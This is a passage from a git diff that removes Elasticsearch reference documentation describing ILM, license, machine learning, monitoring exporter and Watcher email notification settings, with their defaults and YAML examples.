of the truststore file. It must be either `jks` or `PKCS12`. If the -file name ends in ".p12", ".pfx" or "pkcs12", the default is `PKCS12`. -Otherwise, it defaults to `jks`. -end::ssl-truststore-type[] - -tag::ssl-truststore-type-pkcs11[] -The format of the truststore file. For the Java keystore format, use `jks`. For -PKCS#12 files, use `PKCS12`. For a PKCS#11 token, use `PKCS11`. The default is -`jks`. 
-end::ssl-truststore-type-pkcs11[] - -tag::ssl-verification-mode-values[] -Controls the verification of certificates. -+ -Valid values are: - - * `full`, which verifies that the provided certificate is signed by a trusted -authority (CA) and also verifies that the server's hostname (or IP address) -matches the names identified within the certificate. - * `certificate`, which verifies that the provided certificate is signed by a -trusted authority (CA), but does not perform any hostname verification. - * `none`, which performs _no verification_ of the server's certificate. This -mode disables many of the security benefits of SSL/TLS and should only be used -after very careful consideration. It is primarily intended as a temporary -diagnostic mechanism when attempting to resolve TLS errors; its use on -production clusters is strongly discouraged. -+ -The default value is `full`. -end::ssl-verification-mode-values[] diff --git a/docs/reference/settings/ilm-settings.asciidoc b/docs/reference/settings/ilm-settings.asciidoc deleted file mode 100644 index 6aa79df9ec1..00000000000 --- a/docs/reference/settings/ilm-settings.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[role="xpack"] -[[ilm-settings]] -=== {ilm-cap} settings in {es} -[subs="attributes"] -++++ -{ilm-cap} settings -++++ - -These are the settings available for configuring <> ({ilm-init}). - -==== Cluster level settings - -`xpack.ilm.enabled`:: -(<>, Boolean) -deprecated:[7.8.0,Basic License features are always enabled] + -This deprecated setting has no effect and will be removed in Elasticsearch 8.0. - -`indices.lifecycle.history_index_enabled`:: -(<>, Boolean) -Whether ILM's history index is enabled. If enabled, ILM will record the -history of actions taken as part of ILM policies to the `ilm-history-*` -indices. Defaults to `true`. - -`indices.lifecycle.poll_interval`:: -(<>, <>) -How often {ilm} checks for indices that meet policy criteria. Defaults to `10m`. - -==== Index level settings -These index-level {ilm-init} settings are typically configured through index -templates. For more information, see <>. - -`index.lifecycle.indexing_complete`:: -(<>, Boolean) -Indicates whether or not the index has been rolled over. -Automatically set to `true` when {ilm-init} completes the rollover action. -You can explicitly set it to <>. -Defaults to `false`. - -`index.lifecycle.name`:: -(<>, string) -The name of the policy to use to manage the index. - -[[index-lifecycle-origination-date]] -`index.lifecycle.origination_date`:: -(<>, long) -If specified, this is the timestamp used to calculate the index age for its phase transitions. -Use this setting if you create a new index that contains old data and -want to use the original creation date to calculate the index age. -Specified as a Unix epoch value. - -[[index-lifecycle-parse-origination-date]] -`index.lifecycle.parse_origination_date`:: -(<>, Boolean) -Set to `true` to parse the origination date from the index name. -This origination date is used to calculate the index age for its phase transitions. -The index name must match the pattern `^.*-{date_format}-\\d+`, -where the `date_format` is `yyyy.MM.dd` and the trailing digits are optional. -An index that was rolled over would normally match the full format, -for example `logs-2016.10.31-000002`). -If the index name doesn't match the pattern, index creation fails. - -`index.lifecycle.rollover_alias`:: -(<>, string) -The index alias to update when the index rolls over. Specify when using a -policy that contains a rollover action. 
When the index rolls over, the alias is -updated to reflect that the index is no longer the write index. For more -information about rolling indices, see <>. diff --git a/docs/reference/settings/images/monitoring-es-cgroup-true.png b/docs/reference/settings/images/monitoring-es-cgroup-true.png deleted file mode 100644 index c8412642db5..00000000000 Binary files a/docs/reference/settings/images/monitoring-es-cgroup-true.png and /dev/null differ diff --git a/docs/reference/settings/license-settings.asciidoc b/docs/reference/settings/license-settings.asciidoc deleted file mode 100644 index de03444768f..00000000000 --- a/docs/reference/settings/license-settings.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[role="xpack"] -[[license-settings]] -=== License settings - -You can configure this licensing setting in the `elasticsearch.yml` file. -For more information, see -{kibana-ref}/managing-licenses.html[License management]. - -`xpack.license.self_generated.type`:: -(<>) -Set to `basic` (default) to enable basic {xpack} features. + -+ --- -If set to `trial`, the self-generated license gives access only to all the features -of a x-pack for 30 days. You can later downgrade the cluster to a basic license if -needed. --- diff --git a/docs/reference/settings/ml-settings.asciidoc b/docs/reference/settings/ml-settings.asciidoc deleted file mode 100644 index ae1e00b521a..00000000000 --- a/docs/reference/settings/ml-settings.asciidoc +++ /dev/null @@ -1,176 +0,0 @@ - -[role="xpack"] -[[ml-settings]] -=== Machine learning settings in Elasticsearch -++++ -Machine learning settings -++++ - -[[ml-settings-description]] -// tag::ml-settings-description-tag[] -You do not need to configure any settings to use {ml}. It is enabled by default. - -IMPORTANT: {ml-cap} uses SSE4.2 instructions, so it works only on machines whose -CPUs {wikipedia}/SSE4#Supporting_CPUs[support] SSE4.2. If you run {es} on older -hardware, you must disable {ml} (by setting `xpack.ml.enabled` to `false`). - -// end::ml-settings-description-tag[] - -[discrete] -[[general-ml-settings]] -==== General machine learning settings - -`node.roles: [ ml ]`:: -(<>) Set `node.roles` to contain `ml` to identify -the node as a _{ml} node_ that is capable of running jobs. Every node is a {ml} -node by default. -+ -If you use the `node.roles` setting, then all required roles must be explicitly -set. Consult <> to learn more. -+ -IMPORTANT: On dedicated coordinating nodes or dedicated master nodes, do not set -the `ml` role. - - -`xpack.ml.enabled`:: -(<>) Set to `true` (default) to enable {ml} APIs -on the node. -+ -If set to `false`, the {ml} APIs are disabled on the node. Therefore the node -cannot open jobs, start {dfeeds}, or receive transport (internal) communication -requests related to {ml} APIs. If the node is a coordinating node, {ml} requests -from clients (including {kib}) also fail. For more information about disabling -{ml} in specific {kib} instances, see -{kibana-ref}/ml-settings-kb.html[{kib} {ml} settings]. -+ -IMPORTANT: If you want to use {ml-features} in your cluster, it is recommended -that you set `xpack.ml.enabled` to `true` on all nodes. This is the default -behavior. At a minimum, it must be enabled on all master-eligible nodes. If you -want to use {ml-features} in clients or {kib}, it must also be enabled on all -coordinating nodes. - -`xpack.ml.inference_model.cache_size`:: -(<>) The maximum inference cache size allowed. -The inference cache exists in the JVM heap on each ingest node. 
The cache
-affords faster processing times for the `inference` processor. The value can be
-a static byte-sized value (for example, "2gb") or a percentage of total
-allocated heap. The default is "40%". See also <>.
-
-[[xpack-interference-model-ttl]]
-// tag::interference-model-ttl-tag[]
-`xpack.ml.inference_model.time_to_live` {ess-icon}::
-(<>) The time to live (TTL) for models in the
-inference model cache. The TTL is calculated from last access. The `inference`
-processor attempts to load the model from cache. If the `inference` processor
-does not receive any documents for the duration of the TTL, the referenced model
-is flagged for eviction from the cache. If a document is processed later, the
-model is again loaded into the cache. Defaults to `5m`.
-// end::interference-model-ttl-tag[]
-
-`xpack.ml.max_inference_processors`::
-(<>) The total number of `inference` type
-processors allowed across all ingest pipelines. Once the limit is reached,
-adding an `inference` processor to a pipeline is disallowed. Defaults to `50`.
-
-`xpack.ml.max_machine_memory_percent`::
-(<>) The maximum percentage of the machine's
-memory that {ml} may use for running analytics processes. (These processes are
-separate from the {es} JVM.) Defaults to `30` percent. The limit is based on the
-total memory of the machine, not current free memory. Jobs are not allocated to
-a node if doing so would cause the estimated memory use of {ml} jobs to exceed
-the limit.
-
-`xpack.ml.max_model_memory_limit`::
-(<>) The maximum `model_memory_limit` property
-value that can be set for any job on this node. If you try to create a job with
-a `model_memory_limit` property value that is greater than this setting value,
-an error occurs. Existing jobs are not affected when you update this setting.
-For more information about the `model_memory_limit` property, see
-<>.
-
-[[xpack.ml.max_open_jobs]]
-`xpack.ml.max_open_jobs`::
-(<>) The maximum number of jobs that can run
-simultaneously on a node. Defaults to `20`. In this context, jobs include both
-{anomaly-jobs} and {dfanalytics-jobs}. The maximum number of jobs is also
-constrained by memory usage. Thus if the estimated memory usage of the jobs
-would be higher than allowed, fewer jobs will run on a node. Prior to version
-7.1, this setting was a per-node non-dynamic setting. It became a cluster-wide
-dynamic setting in version 7.1. As a result, changes to its value after node
-startup are used only after every node in the cluster is running version 7.1 or
-higher. The maximum permitted value is `512`.
-
-`xpack.ml.nightly_maintenance_requests_per_second`::
-(<>) The rate at which the nightly maintenance task
-deletes expired model snapshots and results. The setting is a proxy to the
-https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-delete-by-query.html#_throttling_delete_requests[`requests_per_second`]
-parameter used in delete by query requests and controls throttling.
-Valid values must be greater than `0.0` or equal to `-1.0`, where `-1.0` means
-that a default value is used. Defaults to `-1.0`.
-
-`xpack.ml.node_concurrent_job_allocations`::
-(<>) The maximum number of jobs that can
-concurrently be in the `opening` state on each node. Typically, jobs spend a
-small amount of time in this state before they move to `open` state. Jobs that
-must restore large models when they are opening spend more time in the `opening`
-state. Defaults to `2`.
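-
-As a concrete illustration of the static settings above, a dedicated {ml} node
-might be configured in `elasticsearch.yml` along the following lines. This is a
-minimal sketch, not a recommendation; the dynamic, cluster-wide settings in this
-section are normally changed with the cluster update settings API instead.
-
-[source,yaml]
-----------------------------------
-# Dedicated machine learning node: only the ml role, so the node
-# runs jobs but does not hold data or act as a master.
-node.roles: [ ml ]
-
-# Enabled by default; shown here only for clarity.
-xpack.ml.enabled: true
-----------------------------------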
- -[discrete] -[[advanced-ml-settings]] -==== Advanced machine learning settings - -These settings are for advanced use cases; the default values are generally -sufficient: - -`xpack.ml.enable_config_migration`:: -(<>) Reserved. - -`xpack.ml.max_anomaly_records`:: -(<>) The maximum number of records that are -output per bucket. The default value is `500`. - -`xpack.ml.max_lazy_ml_nodes`:: -(<>) The number of lazily spun up {ml} nodes. -Useful in situations where {ml} nodes are not desired until the first {ml} job -opens. It defaults to `0` and has a maximum acceptable value of `3`. If the -current number of {ml} nodes is greater than or equal to this setting, it is -assumed that there are no more lazy nodes available as the desired number -of nodes have already been provisioned. If a job is opened and this setting has -a value greater than zero and there are no nodes that can accept the job, the -job stays in the `OPENING` state until a new {ml} node is added to the cluster -and the job is assigned to run on that node. -+ -IMPORTANT: This setting assumes some external process is capable of adding {ml} -nodes to the cluster. This setting is only useful when used in conjunction with -such an external process. - -`xpack.ml.process_connect_timeout`:: -(<>) The connection timeout for {ml} processes -that run separately from the {es} JVM. Defaults to `10s`. Some {ml} processing -is done by processes that run separately to the {es} JVM. When such processes -are started they must connect to the {es} JVM. If such a process does not -connect within the time period specified by this setting then the process is -assumed to have failed. Defaults to `10s`. The minimum value for this setting is -`5s`. - -[discrete] -[[model-inference-circuit-breaker]] -==== {ml-cap} circuit breaker settings - -`breaker.model_inference.limit`:: -(<>) Limit for the model inference breaker, -which defaults to 50% of the JVM heap. If the parent circuit breaker is less -than 50% of the JVM heap, it is bound to that limit instead. See -<>. - -`breaker.model_inference.overhead`:: -(<>) A constant that all accounting estimations -are multiplied by to determine a final estimation. Defaults to 1. See -<>. - -`breaker.model_inference.type`:: -(<>) The underlying type of the circuit breaker. -There are two valid options: `noop` and `memory`. `noop` means the circuit -breaker does nothing to prevent too much memory usage. `memory` means the -circuit breaker tracks the memory used by inference models and can potentially -break and prevent `OutOfMemory` errors. The default is `memory`. diff --git a/docs/reference/settings/monitoring-settings.asciidoc b/docs/reference/settings/monitoring-settings.asciidoc deleted file mode 100644 index e5df39e2f9c..00000000000 --- a/docs/reference/settings/monitoring-settings.asciidoc +++ /dev/null @@ -1,288 +0,0 @@ -[role="xpack"] -[[monitoring-settings]] -=== Monitoring settings in {es} -++++ -Monitoring settings -++++ - -By default, {es} {monitor-features} are enabled but data collection is disabled. -To enable data collection, use the `xpack.monitoring.collection.enabled` setting. - -Except where noted otherwise, these settings can be dynamically updated on a -live cluster with the <> API. - -To adjust how monitoring data is displayed in the monitoring UI, configure -{kibana-ref}/monitoring-settings-kb.html[`xpack.monitoring` settings] in -`kibana.yml`. To control how monitoring data is collected from {ls}, -configure monitoring settings in `logstash.yml`. - -For more information, see <>. 
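-
-For example, data collection can be switched on dynamically with the cluster
-update settings API. This is a minimal sketch; it assumes you have the
-privileges required to update cluster settings.
-
-[source,console]
--------------------------------------------------
-PUT _cluster/settings
-{
-  "persistent": {
-    "xpack.monitoring.collection.enabled": true <1>
-  }
-}
--------------------------------------------------
-// TEST[skip:would enable collection on the test cluster]
-
-<1> Set back to `false` to stop collecting {es} monitoring data.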
- -[discrete] -[[general-monitoring-settings]] -==== General monitoring settings - -`xpack.monitoring.enabled`:: -deprecated:[7.8.0,Basic License features should always be enabled] -(<>) This deprecated setting has no effect. - -[discrete] -[[monitoring-collection-settings]] -==== Monitoring collection settings - -[[monitoring-settings-description]] -// tag::monitoring-settings-description-tag[] -The `xpack.monitoring.collection` settings control how data is collected from -your {es} nodes. -// end::monitoring-settings-description-tag[] - -`xpack.monitoring.collection.enabled`:: -(<>) Set to `true` to enable the collection of -monitoring data. When this setting is `false` (default), {es} monitoring data is -not collected and all monitoring data from other sources such as {kib}, Beats, -and {ls} is ignored. - -[[xpack-monitoring-collection-interval]] -// tag::monitoring-collection-interval-tag[] -`xpack.monitoring.collection.interval` {ess-icon}:: -deprecated:[6.3.0,"Use `xpack.monitoring.collection.enabled` set to `false` instead."] -(<>) Setting to `-1` to disable data collection -is no longer supported beginning with 7.0.0. -+ -Controls how often data samples are collected. Defaults to `10s`. If you -modify the collection interval, set the `xpack.monitoring.min_interval_seconds` -option in `kibana.yml` to the same value. -// end::monitoring-collection-interval-tag[] - -`xpack.monitoring.elasticsearch.collection.enabled`:: -(<>) Controls whether statistics about your -{es} cluster should be collected. Defaults to `true`. This is different from -`xpack.monitoring.collection.enabled`, which allows you to enable or disable all -monitoring collection. However, this setting simply disables the collection of -{es} data while still allowing other data (e.g., {kib}, {ls}, Beats, or APM -Server monitoring data) to pass through this cluster. - -`xpack.monitoring.collection.cluster.stats.timeout`:: -(<>) Timeout for collecting the cluster -statistics, in <>. Defaults to `10s`. - -`xpack.monitoring.collection.node.stats.timeout`:: -(<>) Timeout for collecting the node statistics, -in <>. Defaults to `10s`. - -`xpack.monitoring.collection.indices`:: -(<>) Controls which indices the -{monitor-features} collect data from. Defaults to all indices. Specify the index -names as a comma-separated list, for example `test1,test2,test3`. Names can -include wildcards, for example `test*`. You can explicitly exclude indices by -prepending `-`. For example `test*,-test3` will monitor all indexes that start -with `test` except for `test3`. System indices like .security* or .kibana* -always start with a `.` and generally should be monitored. Consider adding `.*` -to the list of indices ensure monitoring of system indices. For example: -`.*,test*,-test3` - -`xpack.monitoring.collection.index.stats.timeout`:: -(<>) Timeout for collecting index statistics, -in <>. Defaults to `10s`. - -`xpack.monitoring.collection.index.recovery.active_only`:: -(<>) Controls whether or not all recoveries are -collected. Set to `true` to collect only active recoveries. Defaults to `false`. - -`xpack.monitoring.collection.index.recovery.timeout`:: -(<>) Timeout for collecting the recovery -information, in <>. Defaults to `10s`. - -[[xpack-monitoring-history-duration]] -// tag::monitoring-history-duration-tag[] -`xpack.monitoring.history.duration` {ess-icon}:: -(<>) Retention duration beyond which the -indices created by a monitoring exporter are automatically deleted, in -<>. Defaults to `7d` (7 days). 
-+
---
-This setting has a minimum value of `1d` (1 day) to ensure that something is
-being monitored; it cannot be disabled.
-
-IMPORTANT: This setting currently impacts only `local`-type exporters. Indices
-created using the `http` exporter are not deleted automatically.
-
---
-
-// end::monitoring-history-duration-tag[]
-
-`xpack.monitoring.exporters`::
-(<>) Configures where the agent stores monitoring
-data. By default, the agent uses a local exporter that indexes monitoring data
-on the cluster where it is installed. Use an HTTP exporter to send data to a
-separate monitoring cluster. For more information, see
-<>,
-<>, and <>.
-
-[discrete]
-[[local-exporter-settings]]
-==== Local exporter settings
-
-The `local` exporter is the default exporter used by {monitor-features}. As the
-name implies, it exports data to the _local_ cluster, so it requires very
-little configuration.
-
-If you do not supply _any_ exporters, then the {monitor-features} automatically
-create one for you. If any exporter is provided, then no default is added.
-
-[source,yaml]
-----------------------------------
-xpack.monitoring.exporters.my_local:
-  type: local
-----------------------------------
-
-The following settings are specified under the name you select for your
-exporter; a combined sketch follows this list.
-
-`type`::
-Required. The value for a local exporter must always be `local`.
-
-`use_ingest`::
-Whether to supply a placeholder pipeline to the cluster and a pipeline processor
-with every bulk request. The default value is `true`. If disabled, the exporter
-does not use pipelines, which means that a future release cannot automatically
-upgrade bulk requests to future-proof them.
-
-`cluster_alerts.management.enabled`::
-Whether to create cluster alerts for this cluster. The default value is `true`.
-To use this feature, {watcher} must be enabled. If you have a basic license,
-cluster alerts are not displayed.
-
-`wait_master.timeout`::
-Time to wait for the master node to set up the `local` exporter for monitoring,
-in <>. After that wait period, non-master nodes warn the user
-about possible missing configuration. Defaults to `30s`.
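-
-As a sketch only (the exporter name `my_local` and the values shown are
-illustrative, not recommendations), the per-exporter settings above nest under
-the exporter name like this:
-
-[source,yaml]
-----------------------------------
-xpack.monitoring.exporters.my_local:
-  type: local
-  # Do not supply the placeholder ingest pipeline (default is true).
-  use_ingest: false
-  # Do not create cluster alert watches for this cluster (default is true).
-  cluster_alerts.management.enabled: false
-  # Wait up to 30s (the default) for the master to set up the exporter.
-  wait_master.timeout: 30s
----------------------------------- 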
-
-[discrete]
-[[http-exporter-settings]]
-==== HTTP exporter settings
-
-The following settings can be supplied with the `http` exporter. All settings
-are specified under the name you select for your exporter:
-
-[source,yaml]
-----------------------------------
-xpack.monitoring.exporters.my_remote:
-  type: http
-  host: ["host:port", ...]
----------------------------------- 
-
-`type`::
-Required. The value for an HTTP exporter must always be `http`.
-
-`host`::
-Host supports multiple formats, either as an array or as a single value.
-Supported formats include `hostname`, `hostname:port`, `http://hostname`,
-`http://hostname:port`, `https://hostname`, and `https://hostname:port`. Hosts
-must be specified explicitly; they cannot be assumed. The default scheme is
-always `http` and the default port is always `9200` if not supplied as part of
-the `host` string.
-+
-[source,yaml]
-----------------------------------
-xpack.monitoring.exporters:
-  example1:
-    type: http
-    host: "10.1.2.3"
-  example2:
-    type: http
-    host: ["http://10.1.2.4"]
-  example3:
-    type: http
-    host: ["10.1.2.5", "10.1.2.6"]
-  example4:
-    type: http
-    host: ["https://10.1.2.3:9200"]
----------------------------------- 
-
-`auth.username`::
-The username is required if `auth.secure_password` or `auth.password` is
-supplied.
-
-`auth.secure_password`::
-(<>, <>) The
-password for the `auth.username`. Takes precedence over `auth.password` if it is
-also specified.
-
-`auth.password`::
-deprecated:[7.7.0,"Use `auth.secure_password` instead."] The password for the
-`auth.username`. If `auth.secure_password` is also specified, this setting is
-ignored.
-
-`connection.timeout`::
-Amount of time that the HTTP connection waits for a socket to open for the
-request, in <>. The default value is `6s`.
-
-`connection.read_timeout`::
-Amount of time that the HTTP connection waits for a socket to send back a
-response, in <>. The default value is
-`10 * connection.timeout` (`60s` if neither setting is set).
-
-`ssl`::
-Each HTTP exporter can define its own TLS/SSL settings or inherit them. See
-<>.
-
-`proxy.base_path`::
-The base path used to prefix any outgoing request, such as `/base/path` (for
-example, bulk requests would then be sent as `/base/path/_bulk`). There is no
-default value.
-
-`headers`::
-Optional headers that are added to every request, which can assist with routing
-requests through proxies.
-+
-[source,yaml]
-----------------------------------
-xpack.monitoring.exporters.my_remote:
-  headers:
-    X-My-Array: [abc, def, xyz]
-    X-My-Header: abc123
----------------------------------- 
-+
-Array-based headers are sent `n` times where `n` is the size of the array.
-`Content-Type` and `Content-Length` cannot be set. Any headers created by the
-monitoring agent override any headers defined here.
-
-`index.name.time_format`::
-Changes the default date suffix that is appended to the names of the monitoring
-indices. The default value is `yyyy.MM.dd`, which is why the indices are
-created daily.
-
-`use_ingest`::
-Whether to supply a placeholder pipeline to the monitoring cluster and a
-pipeline processor with every bulk request. The default value is `true`. If
-disabled, the exporter does not use pipelines, which means that a future
-release cannot automatically upgrade bulk requests to future-proof them.
-
-`cluster_alerts.management.enabled`::
-Whether to create cluster alerts for this cluster. The default value is `true`.
-To use this feature, {watcher} must be enabled. If you have a basic license,
-cluster alerts are not displayed.
-
-`cluster_alerts.management.blacklist`::
-Prevents the creation of specific cluster alerts. It also removes any applicable
-watches that already exist in the current cluster.
-+
---
-You can add any of the following watch identifiers to the list of blocked alerts:
-
-* `elasticsearch_cluster_status`
-* `elasticsearch_version_mismatch`
-* `elasticsearch_nodes`
-* `kibana_version_mismatch`
-* `logstash_version_mismatch`
-* `xpack_license_expiration`
-
-For example: `["elasticsearch_version_mismatch","xpack_license_expiration"]`.
---
-
-[[ssl-monitoring-settings]]
-:ssl-prefix: xpack.monitoring.exporters.$NAME
-:component: {monitoring}
-:verifies:
-:server!:
-:ssl-context: monitoring
-
-include::ssl-settings.asciidoc[]
diff --git a/docs/reference/settings/notification-settings.asciidoc b/docs/reference/settings/notification-settings.asciidoc
deleted file mode 100644
index 335bdf6bbda..00000000000
--- a/docs/reference/settings/notification-settings.asciidoc
+++ /dev/null
@@ -1,447 +0,0 @@
-[role="xpack"]
-[[notification-settings]]
-=== {watcher} settings in Elasticsearch
-
-[subs="attributes"]
-++++
-{watcher} settings
-++++
-
-[[notification-settings-description]]
-// tag::notification-settings-description-tag[]
-You configure {watcher} settings to set up {watcher} and send notifications via
-<>,
-<>, and
-<>.
-
-All of these settings can be added to the `elasticsearch.yml` configuration file,
-with the exception of the secure settings, which you add to the {es} keystore.
-For more information about creating and updating the {es} keystore, see
-<>. Dynamic settings can also be updated across a cluster with the
-<>.
-// end::notification-settings-description-tag[]
-
-[[general-notification-settings]]
-==== General Watcher Settings
-`xpack.watcher.enabled`::
-(<>)
-Set to `false` to disable {watcher} on the node.
-
-[[xpack-watcher-encrypt-sensitive-data]]
-// tag::watcher-encrypt-sensitive-data-tag[]
-`xpack.watcher.encrypt_sensitive_data` {ess-icon}::
-(<>)
-Set to `true` to encrypt sensitive data. If this setting is enabled, you
-must also specify the `xpack.watcher.encryption_key` setting. For more
-information, see <>.
-// end::watcher-encrypt-sensitive-data-tag[]
-
-`xpack.watcher.encryption_key`::
-(<>)
-Specifies the path to a file that contains a key for encrypting sensitive data.
-If `xpack.watcher.encrypt_sensitive_data` is set to `true`, this setting is
-required. For more information, see <>.
-
-[[xpack-watcher-history-cleaner-service]]
-// tag::watcher-history-cleaner-service-tag[]
-`xpack.watcher.history.cleaner_service.enabled` {ess-icon}::
-(<>)
-added:[6.3.0,Default changed to `true`.]
-deprecated:[7.0.0,Watcher history indices are now managed by the `watch-history-ilm-policy` ILM policy]
-+
-Set to `true` (default) to enable the cleaner service. The cleaner service
-removes previous versions of {watcher} indices (for example,
-`.watcher-history*`) when it determines that they are old. How long {watcher}
-indices are retained is determined by the `xpack.monitoring.history.duration`
-setting, which defaults to 7 days. For more information about that setting,
-see <>.
-// end::watcher-history-cleaner-service-tag[]
-
-`xpack.http.proxy.host`::
-(<>)
-Specifies the address of the proxy server to use to connect to HTTP services.
-
-`xpack.http.proxy.port`::
-(<>)
-Specifies the port number to use to connect to the proxy server.
-
-`xpack.http.proxy.scheme`::
-(<>)
-Protocol used to communicate with the proxy server. Valid values are `http` and
-`https`. Defaults to the protocol used in the request.
-
-`xpack.http.default_connection_timeout`::
-(<>)
-The maximum period to wait for a connection to be established before aborting
-the request.
-
-`xpack.http.default_read_timeout`::
-(<>)
-The maximum period of inactivity between two data packets before the request
-is aborted.
-
-`xpack.http.max_response_size`::
-(<>)
-Specifies the maximum size an HTTP response is allowed to have. Defaults to
-`10mb`; the maximum configurable value is `50mb`.
-
-`xpack.http.whitelist`::
-(<>)
-A list of URLs that the internal HTTP client is allowed to connect to. This
-client is used in the HTTP input and in the webhook, slack, pagerduty,
-and jira actions. This setting can be updated dynamically. It defaults to `*`,
-allowing everything. Note: If you configure this setting and you are using one
-of the slack or pagerduty actions, you must ensure that the corresponding
-endpoints are explicitly allowed as well.
-
-[[ssl-notification-settings]]
-:ssl-prefix: xpack.http
-:component: {watcher} HTTP
-:verifies:
-:server!:
-:ssl-context: watcher
-
-include::ssl-settings.asciidoc[]
-
-[[email-notification-settings]]
-==== Email Notification Settings
-You can configure the following email notification settings in
-`elasticsearch.yml`. For more information about sending notifications
-via email, see <>.
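-
-As an illustration only, the sketch below combines several of the account
-attributes listed below under a hypothetical account named `work`; the host,
-port, and user values are placeholders, not recommendations. Because
-`smtp.secure_password` is a secure setting, the password belongs in the {es}
-keystore rather than in `elasticsearch.yml`.
-
-[source,yaml]
-----------------------------------
-xpack.notification.email.account:
-  work:                         # hypothetical account name
-    profile: standard           # `standard` is the default profile
-    smtp:
-      auth: true                # authenticate with the AUTH command
-      starttls.enable: true     # upgrade the connection with STARTTLS
-      host: smtp.example.com    # placeholder SMTP server
-      port: 587                 # placeholder port; the default is 25
-      user: watcher@example.com # placeholder user name
----------------------------------- 
-
-The matching password would then be added to the keystore under the account's
-`smtp.secure_password` setting.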
-
-`xpack.notification.email.default_account`::
-(<>)
-Default email account to use.
-+
-If you configure multiple email accounts, you must either configure this setting
-or specify the email account to use in the <> action. See
-<>.
-
-`xpack.notification.email.account`::
-Specifies account information for sending notifications via email. You
-can specify the following email account attributes:
-+
---
-[[email-account-attributes]]
-
-`profile`::
-(<>)
-The <> to use to build the MIME
-messages that are sent from the account. Valid values: `standard`, `gmail` and
-`outlook`. Defaults to `standard`.
-
-`email_defaults.*`::
-(<>)
-An optional set of email attributes to use as defaults
-for the emails sent from the account. See
-<> for the supported
-attributes.
-
-`smtp.auth`::
-(<>)
-Set to `true` to attempt to authenticate the user using the
-AUTH command. Defaults to `false`.
-
-`smtp.host`::
-(<>)
-The SMTP server to connect to. Required.
-
-`smtp.port`::
-(<>)
-The SMTP server port to connect to. Defaults to `25`.
-
-`smtp.user`::
-(<>)
-The user name for SMTP. Required.
-
-`smtp.secure_password`::
-(<>, <>)
-The password for the specified SMTP user.
-
-`smtp.starttls.enable`::
-(<>)
-Set to `true` to enable the use of the `STARTTLS`
-command (if supported by the server) to switch the connection to a
-TLS-protected connection before issuing any login commands. Note that
-an appropriate trust store must be configured so that the client will
-trust the server's certificate. Defaults to `false`.
-
-`smtp.starttls.required`::
-(<>)
-If `true`, then `STARTTLS` is required. If that command fails, the
-connection fails. Defaults to `false`.
-
-`smtp.ssl.trust`::
-(<>)
-A list of SMTP server hosts that are assumed trusted and for which
-certificate verification is disabled. If set to `"*"`, all hosts are
-trusted. If set to a whitespace-separated list of hosts, those hosts
-are trusted. Otherwise, trust depends on the certificate the server
-presents.
-
-`smtp.timeout`::
-(<>)
-The socket read timeout. Defaults to two minutes.
-
-`smtp.connection_timeout`::
-(<>)
-The socket connection timeout. Defaults to two minutes.
-
-`smtp.write_timeout`::
-(<>)
-The socket write timeout. Defaults to two minutes.
-
-`smtp.local_address`::
-(<>)
-A configurable local address to use when sending emails. Not configured by
-default.
-
-`smtp.local_port`::
-(<>)
-A configurable local port to use when sending emails. Not configured by default.
-
-`smtp.send_partial`::
-(<>)
-Set to `true` to send the email even if one of the recipient addresses is
-invalid.
-
-`smtp.wait_on_quit`::
-(<>)
-If set to `false`, the QUIT command is sent and the connection is closed without
-waiting for a reply. If set to `true`, the QUIT command is sent and the client
-waits for the server's reply before closing the connection. Defaults to `true`.
---
-
-`xpack.notification.email.html.sanitization.allow`::
-Specifies the HTML elements that are allowed in email notifications. For
-more information, see
-<>. You can
-specify individual HTML elements and the following HTML feature groups:
-+
---
-[[html-feature-groups]]
-
-`_tables`::
-(<>)
-All table-related elements: `<table>`, `<th>`, `<tr>`, `<td>`, `<caption>`,
-`<col>`, and `<colgroup>`.
-
-`_blocks`::
-(<>)
-The following block elements: `<p>`, `<div>`, `<h1>`, `<h2>`, `<h3>`, `<h4>`,
-`<h5>`, `<h6>`, `<ul>`, `<ol>`, `<li>`, and `<blockquote>`.